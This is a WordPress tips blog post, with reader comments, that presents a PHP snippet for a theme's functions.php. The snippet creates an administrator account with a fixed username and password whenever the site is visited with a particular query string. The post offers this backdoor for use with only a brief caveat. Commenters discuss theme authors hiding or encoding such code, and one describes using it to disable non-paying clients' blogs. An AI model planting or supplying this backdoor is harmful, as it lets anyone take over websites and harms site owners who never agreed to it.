Have you ever wanted to create an easy backdoor way to auto-create an administrator account in WordPress? The below code snippet does just that! Simply place the code in your themes functions.php flie and upload to your web server:
<?php
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('brad')) {
$user_id = wp_create_user('brad', 'pa55w0rd');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
To activate this code simply visit http://example.com?backdoor=go
When triggered the code will create a new administrator account with a username brad and password of pa55w0rd. The function also verifies the user account doesn’t exist first before creating it.
Keep in mind using this code is considered a security risk as anyone could easily execute this function by calling the correct querystring. Also don’t be evil, only use this code for good!
Related posts:
- How To: Load User Info Using the Admin Email in WordPress
- How To: Redirect A User After Logging Into WordPress
- How To: Create Facebook Like Username URLs in WordPress
- How To: Hide an Admin Menu in WordPress
- How To: Create ASP and AJAX username availability check example
Enjoy this post? Be sure to subscribe to my RSS feed and my WordPress Tips and Tricks Newsletter! Also check out my new book: Professional WordPress
About Brad
What you’re presenting here is way not fair.
Not fair in what way Daniel?
Obviously, because someone may use it to hack into other people’s blogs.
To set this code up you would need FTP access to a site. So technically you can’t really hack a site with this code, but I see where you are coming from. That’s why I said don’t be evil
@Daniel: If someone has enough access to a blog to be able to implement this code, then this should be the least of your worries.
Brad (or anyone), can you give a practical example of how setting up a backdoor like this could be used legitimately? To be honest, I can’t think of anything good coming out of it.
It’s interesting.
I’m not a WP expert, but if a WordPress theme creator (Such as leland) inserted this code into a themes function.php file… couldn’t he gain access to any blog using the user/pass defined in that code?
Just wondering, as I said, I’m not WP expert.
Keith,
Yeah – they could.
I’m using similar code via a plugin for clients. The plugin sits in the admin sidebar and acts, mostly, as a contact form. It sits there in case a client needs help with something. When they do, they click on the link in the sidebar and fill in the form to “call” us.
If there isn’t already a dedicated user for us, a button is also on that page with a reminder that it’s best to have us work under our own username, and that they can click the button to generate one for us.
Prejudices, Brad? :)
As stated above, it may be very easy for theme creators to insert such code into themes. It can also be encoded and inserted somewhere randomly as just a line of text. Most users are illiterates so chances are they won’t even suspect it.
@Leland: You have FTP access to a client’s blog but are unable to access their administration area (forgotten password and unknown e-mail address) or MySQL. The times you’d need this are rather slim though.
Regardless, it’s not like Brad just invented something new here. This is one of the least detrimental things one could do to your blog if they wanted to. A theme is like a plugin — I could use a theme to spam other blogs, give me access to the files on your server, etc. etc. etc.
@Viper007Bond: Yeah, true. Thanks for the response. I guess it can come in handy for when you just have FTP access and no other way to login.
Also thanks Tommy for the response, that sounds like an interesting application as well.
Nice to see this code snippet got some conversations going! There are definitely many different uses for this code, some good and some bad. Any theme or plugin could contain malicious code, so it’s always a good idea to review the code of any theme or plugin you plan on using if it’s not from a trusted source.
I can see the good and the bad in this. Let’s say you are creating a design for a client, one you know will need support in the future. By adding this to your functions, you will always be able to have a login to access the account, even if they delete yours and forget how to add a new one.
The one note here is that it is the intention of the programmer that really matters. Sure you can add this as a backdoor hack to manipulate WordPress blogs. And lets face it, those with bad intentions most likely already know how to do this.
So for you that are arguing that this is bad, at least the average user can see how it is implemented and can look at the functions of a theme they are thinking of using so any suspicious code.
And for those claiming that you can encode this, that is yet another warning for the average user. If you look in the functions.php file and see a set of random characters, beware. This is encoded data that may do a number of things. I have seen code like this automatically add “spammy” links, and more. And yes, some of the themes with this sort of code are actually found at WordPress.org! (or at least were last time I looked)
Bottom line, if you use this code in your theme, you should disclose to the end user why it is there so they can decide for themselves. If as a user, you aren’t sure about a theme, don’t use it. If you see a random line of characters, know that something is encoded and beware.
Hmm, tbh I’m using this code with clients that have not paid for work I have done to protect it in case they refuse to pay and change passwords. I can easily log in and disable blog until they pay.
A change I would encourage to this code… to prevent any hacker in the world from using this as a backdoor, instead of adding your password in the code, have WordPress create a password for you. Sure, you won’t know what it is, but if you are the only one with access to the email in the code, then you can use the password reset option in WordPress to gain access. This just makes the backdoor more secure for the client, but still accessible for the support.